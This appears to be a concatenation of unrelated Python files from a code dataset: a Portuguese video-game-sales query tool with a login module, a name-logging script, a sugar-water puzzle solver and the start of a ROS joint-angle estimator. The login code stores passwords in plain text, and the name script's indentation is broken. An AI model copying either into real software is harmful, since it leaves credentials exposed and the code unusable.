                return(1)
            if busca == 2:
                graphics2(x,y,ano,gen)
                print('Você utilizou dados já pesquisados')
                return(1)
            if busca == 3:
                graphics3(x,y,reg)
                print('Você utilizou dados já pesquisados')
                return(1)
            if busca == 4:
                graphics4(y,x,gen)
                print('Você utilizou dados já pesquisados')
                return(1)
            if busca == 5:
                graphics5(y,x,gen,intervalo)
                print('Você utilizou dados já pesquisados')
                return(1)
            if busca == 13:
                # Field 3 carries the second numeric series (EU sales).
                zz = A[3].split(',')
                for i in range(20):
                    z.append(float(zz[i]))
                # NOTE(review): ano1/ano2 are computed but never used.
                a = intervalo.split('-')
                ano1 = str(a[0])
                ano2 = str(a[1])
                graphics13(x,y,z,gen,intervalo)
                print('Você utilizou dados já pesquisados')
                return(1)
        if A[0]== arquivo and busca == 6:
            # busca_6 lines carry extra fields: qgen, year list, an1, an2.
            xano=[]
            B = A[4].split(',')
            for i in range(len(B)):
                xano.append(int(B[i]))
            qgen=int(A[3])
            an1=int(A[5])
            an2=int(A[6])
            graphics6(A[2],A[1],xano, qgen, an1, an2)
            print('Você utilizou dados já pesquisados')
            return(1)
    arq.close()
    return(0)
def escrever(valor):
    """Append one history line *valor* to the current user's history file."""
    # Context manager guarantees the handle is closed even on write errors.
    with open(user + '.txt', 'a') as historico:
        historico.write(valor)
def hist():
    """Print every stored query description from the user's history file."""
    z=[]
    print('_'*80)
    arq = open(user +'.txt', 'r')
    for linha in arq:
        # NOTE(review): lines starting with '1'/'2' are treated as a file
        # header and trigger the title -- confirm the header format that
        # the signup code writes.
        if linha[0:1] == '1' or linha[0:1] == '2':
            print('HISTÓRICO:\n')
        else:
            # History lines: only the description before the first '|'.
            z=linha.split('|')
            print(z[0])
    arq.close()
#--------------------------------------MÓDULO DE MENU---------------------------------------------------------
def start(x):
    """Main menu loop (recursive): run searches, show history, or quit.

    x -- user-type flag: '1' routes to menu_1, anything else to menu_2.
    Returns None (via `return()`) when the user picks option 3.
    """
    print('_'*80)
    print('1- Fazer buscas')
    print('2- Meu histórico')
    print('3- Sair')
    print('_'*80)
    op=input('Digite a opção correspondente\n')
    if op == '1':
        if x =='1':
            menu_1()
        else:
            menu_2()
    if op == '2':
        hist()
    if op == '3':
        return()
    # Any other input (or a finished action) re-displays the menu.
    return start(x)
# Genre index (1-12) -> name; shared by every genre prompt in this menu.
_GENEROS = ('Action', 'Role-Playing', 'Shooter', 'Platform', 'Sports',
            'Simulation', 'Fighting', 'Misc', 'Adventure', 'Racing',
            'Puzzle', 'Strategy')
_PROMPT_GENEROS = '1-Action\n2-Role-Playing\n3-Shooter\n4-Platform\n5-Sports\n6-Simulation\n7-Fighting\n8-Misc\n9-Adventure\n10-Racing\n11-Puzzle\n12-Strategy\n'


def _escolher_genero():
    """Read a genre option; return its name, 0 for "go back", or None on
    invalid input (an error message is printed)."""
    gen = input(_PROMPT_GENEROS)
    try:
        gen = int(gen)
    except:
        print('Opção inválida!')
        return None
    if gen < 0 or gen > 12:
        print('Opção inválida!')
        return None
    if gen == 0:
        return 0
    return _GENEROS[gen - 1]


def _ler_ano(msg_invalido, msg_faixa):
    """Read one year in 1980-2020; return it or None after printing
    msg_invalido (not a number) or msg_faixa (out of range)."""
    ano = input('Digite o ano que deseja visualizar\n')
    try:
        ano = int(ano)
    except:
        print(msg_invalido)
        return None
    if ano < 1980 or ano > 2020:
        print(msg_faixa)
        return None
    return ano


def _ler_intervalo(msg_invalido, msg_faixa):
    """Read a year interval; return the ordered pair (anoA, anoB), 0 when
    the user typed "0" to leave, or None on invalid input (message printed)."""
    print('_'*80)
    anoA = input('Digite o primeiro ano do intervalo\t["0"para sair]\n')
    try:
        anoA = int(anoA)
    except:
        print(msg_invalido)
        return None
    if anoA == 0:
        return 0
    anoB = input('Digite o segundo ano do intervalo\t["0"para sair]\n')
    try:
        anoB = int(anoB)
    except:
        print(msg_invalido)
        return None
    if anoB == 0:
        return 0
    if anoA > anoB:
        anoA, anoB = anoB, anoA
    if anoA < 1980 or anoB > 2020:
        print(msg_faixa)
        return None
    return (anoA, anoB)


def menu_1():
    """Full search menu (manager): searches 1-6 and 13.

    Each branch validates input, tries a cached result via ler() and
    only runs the expensive busca_N() when nothing was cached, then
    recurses back into the menu.

    Fixes over the original: "0 to quit" now compares the converted int
    (the raw input string was compared with 0 and never matched), the
    invalid-genre-count path now returns instead of falling through to
    a str/int comparison, and the twelve-way genre if-chains are a
    single table lookup (_escolher_genero).
    """
    print('_'*80)
    print('\t\t\t\tBUSCAS')
    print('-'*80)
    print('1: Média global de vendas por gênero de jogos que \n\tforam lançados em um determinado ano.')
    print('-'*80)
    print('2: Quais as 10 empresas que mais publicaram em um determinado\n\t ano, usando um determinado gênero')
    print('-'*80)
    print('3: Top 10 média de vendas por plataforma para uma determinada região.')
    print('-'*80)
    print('4: Média de vendas de acordo com um determinado gênero dos jogos \n\tvendidos em NA, EU, JP, Outros e global.')
    print('-'*80)
    print('5: Média das Vendas globais por ano,baseadas em um determinado intervalo\n\tde anos e um gênero.')
    print('-'*80)
    print('6: Quantidade de jogos de acordo com os “X” maiores gênero em um\n\t intervalo de anos.')
    print('-'*80)
    print('13: Média global de vendas por gênero de jogos que \n\tforam lançados em um determinado ano.')
    print('_'*80)
    op = input('Digite a opção que deseja buscar ["0" para retornar ao menu inicial]\n')
    if op == '0':
        return
    if op == '1':
        ano = _ler_ano('Ano inválido!', 'Ano inválido!')
        if ano is None:
            return menu_1()
        # arquivo, ano, genero, intervalo, regiao, busca
        if ler('busca_1,Ano:'+str(ano), str(ano), 0, 0, 0, 1) == 0:
            busca_1(str(ano), '0', '0')
        return menu_1()
    if op == '2':
        ano = _ler_ano('Ano inválido!', 'Ano inválido!')
        if ano is None:
            return menu_1()
        print('-'*80)
        print('-'*80)
        print('Escolha o gênero:')
        print('-'*80)
        gen = _escolher_genero()
        if gen is None or gen == 0:
            return menu_1()
        if ler('busca_2,Ano:'+str(ano)+',Gênero:'+str(gen), str(ano), str(gen), 0, 0, 2) == 0:
            busca_2(str(ano), gen)
        return menu_1()
    if op == '3':
        print('Regiões:\n1- NA\n2- EU\n3- JP\n4- Other\n')
        regiao = input('Digite a região que deseja visualizar\n')
        try:
            regiao = int(regiao)
        except:
            print('Opção inválida!')
            return menu_1()
        if regiao < 1 or regiao > 4:
            print('Opção inválida!')
            return menu_1()
        r = regiao + 5  # busca_3 expects the dataset column index (6-9)
        regiao = {1: 'NA', 2: 'EU', 3: 'JP', 4: 'Other'}[regiao]
        if ler('busca_3,Região:'+regiao, 0, 0, 0, regiao, 3) == 0:
            busca_3(r)
        return menu_1()
    if op == '4':
        print('-'*80)
        print('Escolha o gênero: \t["0" para retornar ao menu inicial]')
        print('-'*80)
        gen = _escolher_genero()
        if gen is None or gen == 0:
            return menu_1()
        if ler('busca_4,Gênero:'+gen, 0, gen, 0, 0, 4) == 0:
            busca_4(gen)
        return menu_1()
    if op == '5':
        iv = _ler_intervalo('Opção inválida!', 'Intervalo inválido.')
        if iv is None or iv == 0:
            return menu_1()
        anoA, anoB = iv
        print('-'*80)
        print('Escolha o gênero:')
        print('-'*80)
        gen = _escolher_genero()
        if gen is None:
            return menu_1()
        if gen == 0:
            return  # original behaviour: "0" here leaves the menu entirely
        intervalo = str(anoA) + '-' + str(anoB)
        if ler('busca_5,Gênero:'+str(gen)+',Intervalo:'+str(intervalo), 0, str(gen), intervalo, 0, 5) == 0:
            busca_5(anoA, anoB, gen, intervalo)
        return menu_1()
    if op == '6':
        iv = _ler_intervalo('Ano inválido!', 'Intervalo inválido!')
        if iv is None:
            return menu_1()
        if iv == 0:
            return  # "0" leaves the menu (now actually reachable)
        anoA, anoB = iv
        qgen = input('Digite a quantidade de gêneros que deseja visualizar [1 a 12] \t["0"para sair]\n')
        try:
            qgen = int(qgen)
        except:
            print('Opção inválida!')
            return menu_1()  # fixed: the original fell through with qgen as a str
        if qgen < 1 or qgen > 12:
            print('Número inválido!')
            return menu_1()
        intervalo = str(anoA) + '-' + str(anoB)
        if ler('busca_6,Gêneros:'+str(qgen)+',Intervalo:'+str(intervalo), 0, 0, intervalo, 0, 6) == 0:
            busca_6(anoA, anoB, qgen)
        return menu_1()
    if op == '13':
        iv = _ler_intervalo('Ano inválido!', 'Intervalo indisponível!')
        if iv is None or iv == 0:
            return menu_1()
        anoA, anoB = iv
        print('-'*80)
        print('-'*80)
        print('Escolha o gênero:')
        print('-'*80)
        gen = _escolher_genero()
        if gen is None:
            return menu_1()
        if gen == 0:
            return
        intervalo = str(anoA) + '-' + str(anoB)
        if ler('busca_13,Gênero:'+str(gen)+',Intervalo:'+str(intervalo), 0, str(gen), intervalo, 0, 13) == 0:
            busca_13(anoA, anoB, gen)
        return menu_1()
    return menu_1()
# Genre index (1-12) -> name; shared by every genre prompt in this menu.
_GENEROS = ('Action', 'Role-Playing', 'Shooter', 'Platform', 'Sports',
            'Simulation', 'Fighting', 'Misc', 'Adventure', 'Racing',
            'Puzzle', 'Strategy')
_PROMPT_GENEROS = '1-Action\n2-Role-Playing\n3-Shooter\n4-Platform\n5-Sports\n6-Simulation\n7-Fighting\n8-Misc\n9-Adventure\n10-Racing\n11-Puzzle\n12-Strategy\n'


def _escolher_genero():
    """Read a genre option; return its name, 0 for "go back", or None on
    invalid input (an error message is printed)."""
    gen = input(_PROMPT_GENEROS)
    try:
        gen = int(gen)
    except:
        print('Opção inválida!')
        return None
    if gen < 0 or gen > 12:
        print('Opção inválida!')
        return None
    if gen == 0:
        return 0
    return _GENEROS[gen - 1]


def _ler_ano(msg_invalido, msg_faixa):
    """Read one year in 1980-2020; return it or None after printing
    msg_invalido (not a number) or msg_faixa (out of range)."""
    ano = input('Digite o ano que deseja visualizar\n')
    try:
        ano = int(ano)
    except:
        print(msg_invalido)
        return None
    if ano < 1980 or ano > 2020:
        print(msg_faixa)
        return None
    return ano


def _ler_intervalo(msg_invalido, msg_faixa):
    """Read a year interval; return the ordered pair (anoA, anoB), 0 when
    the user typed "0" to leave, or None on invalid input (message printed)."""
    print('_'*80)
    anoA = input('Digite o primeiro ano do intervalo\t["0"para sair]\n')
    try:
        anoA = int(anoA)
    except:
        print(msg_invalido)
        return None
    if anoA == 0:
        return 0
    anoB = input('Digite o segundo ano do intervalo\t["0"para sair]\n')
    try:
        anoB = int(anoB)
    except:
        print(msg_invalido)
        return None
    if anoB == 0:
        return 0
    if anoA > anoB:
        anoA, anoB = anoB, anoA
    if anoA < 1980 or anoB > 2020:
        print(msg_faixa)
        return None
    return (anoA, anoB)


def menu_2():
    """Restricted search menu (staff): only searches 1, 2, 5 and 13.

    Same per-branch flow as menu_1 (validate, try the ler() cache, run
    busca_N() on a miss, recurse).  The duplicated genre if-chains and
    the never-true string-vs-0 "quit" checks of the original are fixed
    the same way as in menu_1.
    """
    print('_'*80)
    print('\t\t\t\tBUSCAS')
    print('-'*80)
    print('1: Média global de vendas por gênero de jogos que \n\tforam lançados em um determinado ano.\n')
    print('-'*80)
    print('2: Quais as 10 empresas que mais publicaram em um determinado\n\t ano, usando um determinado gênero\n')
    print('-'*80)
    print('5: Média das Vendas globais por ano,baseadas em um determinado intervalo\n\tde anos e um gênero.\n')
    print('-'*80)
    print('13: Média global de vendas por gênero de jogos que \n\tforam lançados em um determinado ano.\n')
    print('_'*80)
    op = input('Digite a opção que deseja buscar ["0" para retornar ao menu inicial]\n')
    if op == '0':
        return
    if op == '1':
        ano = _ler_ano('Ano inválido!', 'Ano indisponível!')
        if ano is None:
            return menu_2()
        # arquivo, ano, genero, intervalo, regiao, busca
        if ler('busca_1,Ano:'+str(ano), str(ano), 0, 0, 0, 1) == 0:
            busca_1(str(ano), '0', '0')
        return menu_2()
    if op == '2':
        ano = _ler_ano('Ano inválido!', 'Ano indisponível')
        if ano is None:
            return menu_2()
        print('-'*80)
        print('-'*80)
        print('Escolha o gênero:')
        print('-'*80)
        gen = _escolher_genero()
        if gen is None:
            return menu_2()
        if gen == 0:
            return  # original behaviour: "0" here leaves the menu entirely
        if ler('busca_2,Ano:'+str(ano)+',Gênero:'+str(gen), str(ano), str(gen), 0, 0, 2) == 0:
            busca_2(str(ano), gen)
        return menu_2()
    if op == '5':
        iv = _ler_intervalo('Opção inválida!', 'Intervalo inválido.')
        if iv is None or iv == 0:
            return menu_2()
        anoA, anoB = iv
        print('-'*80)
        print('Escolha o gênero:')
        print('-'*80)
        gen = _escolher_genero()
        if gen is None or gen == 0:
            return menu_2()
        intervalo = str(anoA) + '-' + str(anoB)
        if ler('busca_5,Gênero:'+str(gen)+',Intervalo:'+str(intervalo), 0, str(gen), intervalo, 0, 5) == 0:
            busca_5(anoA, anoB, gen, intervalo)
        return menu_2()
    if op == '13':
        iv = _ler_intervalo('Ano inválido!', 'Intervalo indisponível!')
        if iv is None or iv == 0:
            return menu_2()
        anoA, anoB = iv
        print('-'*80)
        print('-'*80)
        print('Escolha o gênero:')
        print('-'*80)
        gen = _escolher_genero()
        if gen is None:
            return menu_2()
        if gen == 0:
            return
        intervalo = str(anoA) + '-' + str(anoB)
        if ler('busca_13,Gênero:'+str(gen)+',Intervalo:'+str(intervalo), 0, str(gen), intervalo, 0, 13) == 0:
            busca_13(anoA, anoB, gen)
        return menu_2()
    print('Opção inválida!')
    return menu_2()
#-------------------------------------------------------MÓDULO DE SENHAS-----------------------
def login():
    """Authenticate an existing user or register a new one.

    Returns a tuple ``(user, tipo)`` where tipo is 'Gerente' (manager)
    or 'Funcionário' (employee).  Credentials live in '<USER>.txt'
    whose first line is the user-type digit ('1'/'2') immediately
    followed by the password, stored in plain text.
    """
    def autenticador(x,y,operação):
        # x: user name, y: password — or the sentinel 'y', which only
        # tests whether the user file exists.  operação: 'login' | 'new'.
        # Returns 'Gerente'/'Funcionário' on success, '0' on failure,
        # and None both for the "user exists" probe and for 'new'.
        # NOTE(review): a real password equal to 'y' can never be
        # verified because 'y' doubles as the existence-test sentinel.
        if operação=='login':
            if os.path.isfile(x +'.txt'):
                if y !='y':
                    arq = open(x +'.txt', 'r')
                    for linha in arq:
                        tipo = linha[0:1]
                        if tipo == '1':
                            # strip the type digit and trailing newline
                            password = linha[1:len(linha)-1]
                            if password == y:
                                arq.close()
                                return ('Gerente')
                        if tipo == '2':
                            password = linha[1:len(linha)-1]
                            if password == y:
                                arq.close()
                                return ('Funcionário')
                    arq.close()
                    return('0')# wrong password
            else: # unknown user name
                return('0')
        if operação=='new':
            if os.path.isfile(x +'.txt'):
                print('Usuário já existe!')
                return()
            else:
                arq = open(x +'.txt', 'a')
                arq.close()
                arq = open(x +'.txt', 'a')
                arq.write(y+'\n')
                arq.close()
                print('Usuário Cadastrado!')
                return()
    print('_'*80)
    print ('1-Para para fazer Login\n')
    print ('2-Para criar um Novo Usuário')
    print('_'*80)
    x=input()
    print('_'*80)
    if x == '2': # register a new user-------------------------------------------------------
        print('\t\t\t\tNovo Usuário:')
        user=input('Usuário:\n')
        user=user.upper()
        if user == '':
            print('Usuário inválido!')
            return login()
        password=input('Senha:\n')
        if password == '':
            print('Senha inválida!')
            return login()
        tipo=input('Digite tipo de usuário:\n1-Gerente\n2-Funcionário\n')
        if tipo == '1' or tipo =='2':
            password = tipo+password # the type digit is stored as the first character
            autenticador(user,password,'new')
            return login()
        else:
            print('Opção inválida!')
            return login()
    if x == '1':# log in an existing user----------------------------------------------------
        print('\t\t\t\tFazer login:')
        user=input('Usuário:\n')
        user=user.upper()
        # first call only probes that the user file exists ('y' sentinel)
        w=autenticador(user,'y','login')
        if w =='0':
            print('\tNome de usuário incorreto!, por favor tente novamente:\n')
            return login()
        password=input('Senha:\n')
        z=autenticador(user,password,'login')
        if z == '0':
            print('Senha incorreta!tente novamente')
            return login()
        return(user,z)
    else:
        print('Opção inválida!')
        return login()
#_start_____________________________________________________________________________________________
# Script entry point: greet, authenticate, then open the menu matching
# the user's role.
global user  # NOTE(review): no-op at module level; `user` is a module global either way
print('\n\t\t\t\tBem Vindo(a)!')
user,tipo=login()
print('_'*80)
print('Conectado como:\t-{0}-\t[{1}]'.format(user,tipo))
print('_'*80)
if tipo =='Gerente':
    start('1')  # managers get the full search menu
else:
    start ('0')  # employees get the restricted menu
| michloliveira/Projeto-IP_2018--Python | P-version 3.8.1/P-version 3.8.1.py | P-version 3.8.1.py | py | 47,013 | python | pt | code | 0 | github-code | 90 |
44355280626 | #adding next 3 friends due to input func
def main():
print('Adding next 3 friends due to function input.')
name4 = input('Name #4:')
name5 = input('Name #5:')
name6= input('Name #6:')
file = open('names.txt', 'a')
file.write(name4 + '\n')
file.write(name5 + '\n')
file.write(name6 + '\n')
file.write('Johny B\n')
file.write('David G\n')
file.write('Gorge.H\n')
file.close()
read_file()
def read_file():
    """Print a header followed by every name currently stored in names.txt."""
    with open('names.txt', 'r') as file:
        print('Here you have all names saved to the file names.txt')
        print(file.read())
main() | PythonProfessional83/operations_on_files_exceptions | adding_names_tofile.py | adding_names_tofile.py | py | 588 | python | en | code | 0 | github-code | 90 |
import sys
readline = sys.stdin.readline
# Brute force: only a limited set of water amounts (multiples of 100*A
# and 100*B grams) can be formed, so try every A/B combination.
A,B,C,D,E,F = map(int,readline().split())
ans = [0,0]          # [total mass, sugar mass] of the best mixture found
maxrate = 0.0        # best sugar concentration so far
for a in range(0,F,100 * A):
    for b in range(0,F,100 * B):
        if a == 0 and b == 0:
            continue  # must pour at least some water
        if a + b > F:
            break     # beaker capacity F exceeded
        water = a + b
        # At most (water/100) * E grams of sugar dissolve in this much
        # water, and the total must still fit in the beaker.
        limit = min(((a + b) // 100) * E, F - water)
        maxsugar = 0
        # Sugar is added in lumps of C and D grams; find the largest
        # total not exceeding the solubility/capacity limit.
        for c in range(0,limit + 1,C):
            for d in range(0,limit + 1,D):
                if c + d > limit:
                    break
                if c + d > maxsugar:
                    maxsugar = c + d
        rate = maxsugar / (water + maxsugar)
        if rate > maxrate:
            maxrate = rate
            ans = [water + maxsugar, maxsugar]
if maxrate == 0.0:
    # No sugar could ever be added: output the smallest pure-water pour.
    print(min(A,B) * 100, 0)
    exit(0)
print(*ans)
25901310278 | #!/usr/bin/env python3
import image1
import image2
import target_detector
import roslib
import sys
import rospy
import cv2
import numpy as np
import message_filters
from math import pi
from math import atan2
from std_msgs.msg import String
from sensor_msgs.msg import Image
from std_msgs.msg import Float64MultiArray, Float64
from cv_bridge import CvBridge, CvBridgeError
from sympy import symbols, Matrix, cos, sin
import sympy
class angle_estimator:
  """ROS node that estimates the robot arm's joint angles from two
  orthogonal camera views and drives the end effector toward a detected
  target with a closed-loop PD controller.

  Camera 1 is assumed to give the YZ plane and camera 2 the XZ plane —
  TODO confirm against the launch file.  Helper modules image1/image2
  provide per-image colour-blob detection and pixel-to-metre scaling.
  """
  def __init__(self):
    """Initialise the node, publishers, synchronised subscribers and
    all mutable state (last detections, timing, symbolic FK cache)."""
    rospy.init_node('angle_estimator', anonymous=True)
    self.robot_joint2_estimated_pub = rospy.Publisher("/robot/joint2_position_estimator/command", Float64, queue_size=10)
    self.robot_joint3_estimated_pub = rospy.Publisher("/robot/joint3_position_estimator/command", Float64, queue_size=10)
    self.robot_joint4_estimated_pub = rospy.Publisher("/robot/joint4_position_estimator/command", Float64, queue_size=10)
    self.robot_joint1_pub = rospy.Publisher("/robot/joint1_position_controller/command", Float64, queue_size=10)
    self.robot_joint2_pub = rospy.Publisher("/robot/joint2_position_controller/command", Float64, queue_size=10)
    self.robot_joint3_pub = rospy.Publisher("/robot/joint3_position_controller/command", Float64, queue_size=10)
    self.robot_joint4_pub = rospy.Publisher("/robot/joint4_position_controller/command", Float64, queue_size=10)
    # Estimated end-effector position, published per axis for plotting.
    self.ee_pos_x = rospy.Publisher("/robot/ee_x/command", Float64, queue_size=10)
    self.ee_pos_y = rospy.Publisher("/robot/ee_y/command", Float64, queue_size=10)
    self.ee_pos_z = rospy.Publisher("/robot/ee_z/command", Float64, queue_size=10)
    # Approximate-time-synchronised pair of camera images -> self.callback.
    self.image_sub1 = message_filters.Subscriber("/camera1/robot/image_raw", Image)
    self.image_sub2 = message_filters.Subscriber("/camera2/robot/image_raw", Image)
    self.ts = message_filters.ApproximateTimeSynchronizer([self.image_sub1, self.image_sub2], 10, 1, allow_headerless=True)
    self.ts.registerCallback(self.callback)
    # Last known 3-D positions of the colour blobs (fallbacks when a
    # detection fails and returns zeros).
    self.blue = np.array([0,0,0])
    self.green = np.array([0,0,0])
    self.red = np.array([0,0,0])
    self.time_trajectory = rospy.get_time()
    self.time_previous_step = np.array([rospy.get_time()], dtype='float64')
    self.time_previous_step2 = np.array([rospy.get_time()], dtype='float64')
    self.oldq = np.array([0,0,0,0])
    # PD controller error state (position error and its derivative).
    self.error = np.array([0.0,0.0,0.0], dtype='float64')
    self.error_d = np.array([0.0,0.0,0.0], dtype='float64')
    self.bridge = CvBridge()
    # Symbolic forward-kinematics matrix/Jacobian, lazily built on the
    # first image callback (Matrix([0]) is the "not built yet" marker).
    self.fkmatrix = Matrix([0])
    self.fkjacobian = Matrix([0])
    self.symThetas = []
    self.targetXpos = 0
    self.targetYpos = 0
    self.targetZpos = 0
    # Last valid target detections per camera plane (occlusion fallback).
    self.lastYZPosition = np.array([0,0])
    self.lastXZPosition = np.array([0,0])
    # Commanded joint angles echoed back -> self.jointscallback.
    self.joint2 = message_filters.Subscriber("/robot/joint2_position_controller/command", Float64)
    self.joint3 = message_filters.Subscriber("/robot/joint3_position_controller/command", Float64)
    self.joint4 = message_filters.Subscriber("/robot/joint4_position_controller/command", Float64)
    self.jointmf = message_filters.ApproximateTimeSynchronizer([self.joint2, self.joint3, self.joint4], 10, 1, allow_headerless=True)
    self.jointmf.registerCallback(self.jointscallback)
    self.actualJoints = np.array([0,0,0,0])
  def detect3dyellow(self, img1, img2):
    """Combine both camera views into the yellow joint's 3-D position (metres)."""
    a1 = image1.pixel2meter(img1)
    a2 = image1.pixel2meter(img2)
    yellowYZ = a1*image1.detect_yellow(img1)
    yellowXZ = a2*image2.detect_yellow(img2)
    # x from camera 2, y from camera 1, z averaged between the two views.
    xyz = np.array([yellowXZ[0], yellowYZ[0], (yellowYZ[1]+yellowXZ[1])/2])
    return xyz
  def detect3dred(self, img1, img2):
    """Combine both views into the red joint's 3-D position, falling back
    to the last known position when any coordinate comes back zero
    (detection failed / blob occluded)."""
    a1 = image1.pixel2meter(img1)
    a2 = image1.pixel2meter(img2)
    redYZ = a1 *image1.detect_red(img1)
    redXZ = a2 *image2.detect_red(img2)
    xyz = np.array([redXZ[0], redYZ[0], (redYZ[1]+redXZ[1])/2])
    if (np.array([0,0,0]) == xyz).any():
      xyz = self.red
    self.red = xyz
    return xyz
  def detect3dblue(self, img1, img2):
    """Combine both camera views into the blue joint's 3-D position (metres)."""
    a1 = image1.pixel2meter(img1)
    a2 = image1.pixel2meter(img2)
    blueYZ = a1*image1.detect_blue(img1)
    blueXZ = a2*image2.detect_blue(img2)
    xyz = np.array([blueXZ[0], blueYZ[0], (blueYZ[1]+blueXZ[1])/2])
    return xyz
  def detect3dgreen(self, img1, img2):
    """Combine both views into the green joint's 3-D position, with the
    same zero-coordinate fallback as detect3dred."""
    a1 = image1.pixel2meter(img1)
    a2 = image1.pixel2meter(img2)
    greenYZ = a1 * image1.detect_green(img1)
    greenXZ = a2 * image2.detect_green(img2)
    xyz = np.array([greenXZ[0], greenYZ[0], (greenYZ[1]+greenXZ[1])/2])
    if (np.array([0,0,0]) == xyz).any():
      xyz = self.green
    self.green = xyz
    return xyz
  def projection(self, link_vector, normal_vector):
    """Project link_vector onto the plane whose normal is normal_vector."""
    return(link_vector - (np.dot(link_vector, normal_vector)/np.linalg.norm(normal_vector)**2)*normal_vector)
  def length(self, v):
    """Euclidean length of v."""
    return np.sqrt(np.dot(v, v))
  def vector_angle(self, u, v):
    """Unsigned angle (radians) between vectors u and v."""
    return(np.arccos(np.dot(u, v) / (np.linalg.norm(u) * np.linalg.norm(v))))
  def plane_angles(self, link_vector):
    """Decompose a link vector into rotations about x and y.

    The x rotation is the angle of the YZ-plane projection from the
    -z axis, sign-chosen by the y component and clamped to ±pi/2; the
    y rotation is the angle between that projection and the full
    vector, signed by the x component.  Returns (x_rotation, y_rotation).
    """
    proj_xz = self.projection(link_vector, np.array([0,1,0]))
    proj_yz = self.projection(link_vector, np.array([1,0,0]))
    proj_xy = self.projection(link_vector, np.array([0,0,1]))
    #proj2 = self.projection(proj_xz, np.array([1,0,0]))
    x_rotation = 0
    y_rotation =0
    #positive x rotation
    if link_vector[1]<=0:
      x_rotation = self.vector_angle(proj_yz, [0,0,-1])
      if x_rotation > np.pi/2:
        x_rotation = np.pi/2
    #negative x rotation
    else:
      x_rotation = -self.vector_angle(proj_yz, [0,0,-1])
      if x_rotation < -np.pi/2:
        x_rotation = -np.pi/2
    #if np.abs(self.lastXrot - x_rotation) > np.pi/2:
    #  x_rotation = self.lastXrot
    self.lastXrot = x_rotation
    if link_vector[0]>=0:
      y_rotation = self.vector_angle(proj_yz, link_vector)
    else:
      y_rotation = -self.vector_angle(proj_yz, link_vector)
    return(x_rotation, y_rotation)
  def detect3dtarget(self, img1, img2):
    """3-D position of the target sphere, keeping the last valid
    per-plane detection whenever a camera reports (0, 0) (occluded)."""
    a1 = image1.pixel2meter(img1)
    a2 = image1.pixel2meter(img2)
    targetYZ = a1*image1.detect_target(img1)
    targetXZ = a2*image2.detect_target(img2)
    if targetYZ[0] == 0 and targetYZ[1] == 0:
      targetYZ = self.lastYZPosition
    else:
      self.lastYZPosition = targetYZ
    if targetXZ[0] == 0 and targetXZ[1] == 0:
      targetXZ = self.lastXZPosition
    else:
      self.lastXZPosition = targetXZ
    xyz = np.array([targetXZ[0], targetYZ[0], ((targetYZ[1]+targetXZ[1])/2)])
    return xyz
  def jointangles(self, img1, img2):
    """Estimate joint angles [0, joint2, joint3, joint4] from the blob
    positions: joints 2/3 from the blue->green link orientation and
    joint 4 from the angle between the blue->green and green->red links
    (joint 1 is assumed fixed at 0)."""
    yellow = self.detect3dyellow(img1, img2)
    blue = self.detect3dblue(img1, img2)
    green = self.detect3dgreen(img1, img2)
    red = self.detect3dred(img1, img2)
    vectYB = blue - yellow
    vectBG = green - blue
    vectGR = red - green
    joint2and3 = self.plane_angles(vectBG)
    joint_4 = self.vector_angle(vectBG, vectGR)
    #print(joint_4)
    #if(vectGR[1]> 0):
      #joint_4 = -joint_4
    return np.array([0, joint2and3[0], joint2and3[1], joint_4])
  def dh_matrix(self, d, theta, alpha, r):
    """Numeric Denavit-Hartenberg transform for one link (4x4)."""
    return(np.array([ [np.cos(theta) , -np.sin(theta)*np.cos(alpha), np.sin(theta)*np.sin(alpha) , r*np.cos(theta)],
                    [np.sin(theta) , np.cos(theta)*np.cos(alpha) , -np.cos(theta)*np.sin(alpha) , r*np.sin(theta)],
                    [0 , np.sin(alpha) , np.cos(alpha) , d],
                    [0 , 0 , 0 , 1]]))
  def dh_matrix_sym(self, d, theta, alpha, r):
    """Symbolic (sympy) Denavit-Hartenberg transform for one link (4x4)."""
    return(Matrix([ [cos(theta) , -sin(theta)*cos(alpha), sin(theta)*sin(alpha) , r*cos(theta)],
                    [sin(theta) , cos(theta)*cos(alpha) , -cos(theta)*sin(alpha) , r*sin(theta)],
                    [0 , sin(alpha) ,cos(alpha) ,d],
                    [0 , 0 , 0 ,1]]))
  def sym_forward_kinametics(self, ds, thetas, alphas, rs):
    """Build the 4-link symbolic FK chain and its position Jacobian,
    then substitute the supplied DH parameters.  Returns
    (transform_matrix, jacobian).  Superseded by make_matrix() +
    sub_thetas() in the live pipeline."""
    theta0, theta1, theta2, theta3, r0, r1, r2, r3, alpha0, alpha1, alpha2, alpha3, d0, d1, d2, d3 = symbols('theta0 theta1 theta2 theta3 r0 r1 r2 r3 alpha0 alpha1 alpha2 alpha3 d0 d1 d2 d3')
    matrix0 = (self.dh_matrix_sym(d0, theta0, alpha0, r0))
    matrix1 = (self.dh_matrix_sym(d1, theta1, alpha1, r1))
    matrix2 = (self.dh_matrix_sym(d2, theta2, alpha2, r2))
    matrix3 = (self.dh_matrix_sym(d3, theta3, alpha3, r3))
    finalMatrix = (((matrix0 * matrix1) * matrix2) * matrix3)
    jacobian = (finalMatrix.col(3).jacobian(Matrix([theta0, theta1, theta2, theta3])))
    finalMatrix = (finalMatrix.subs([(theta0 ,thetas[0]), (theta1 ,thetas[1]),(theta2 ,thetas[2]),(theta3 ,thetas[3])]))
    finalMatrix = (finalMatrix.subs([(d0 ,ds[0]), (d1 ,ds[1]),(d2 ,ds[2]),(d3 ,ds[3])]))
    finalMatrix = (finalMatrix.subs([(alpha0 ,alphas[0]), (alpha1, alphas[1]),(alpha2 ,alphas[2]),(alpha3 ,alphas[3])]))
    finalMatrix = (finalMatrix.subs([(r0 ,rs[0]), (r1 ,rs[1]),(r2 ,rs[2]),(r3 ,rs[3])]))
    jacobian = (jacobian.subs([(theta0 ,thetas[0]), (theta1 ,thetas[1]),(theta2 ,thetas[2]),(theta3 ,thetas[3])]))
    jacobian = (jacobian.subs([(d0 ,ds[0]), (d1 ,ds[1]),(d2 ,ds[2]),(d3 ,ds[3])]))
    jacobian = (jacobian.subs([(alpha0 ,alphas[0]), (alpha1, alphas[1]),(alpha2 ,alphas[2]),(alpha3 ,alphas[3])]))
    jacobian = (jacobian.subs([(r0 ,rs[0]), (r1 ,rs[1]),(r2 ,rs[2]),(r3 ,rs[3])]))
    return(finalMatrix, jacobian)
  def make_matrix(self):
    """Build the symbolic FK transform and Jacobian once, with this
    robot's fixed DH constants substituted and only the four joint
    angles (theta0..theta3) left free.  Returns
    (fk_matrix, jacobian, [theta symbols])."""
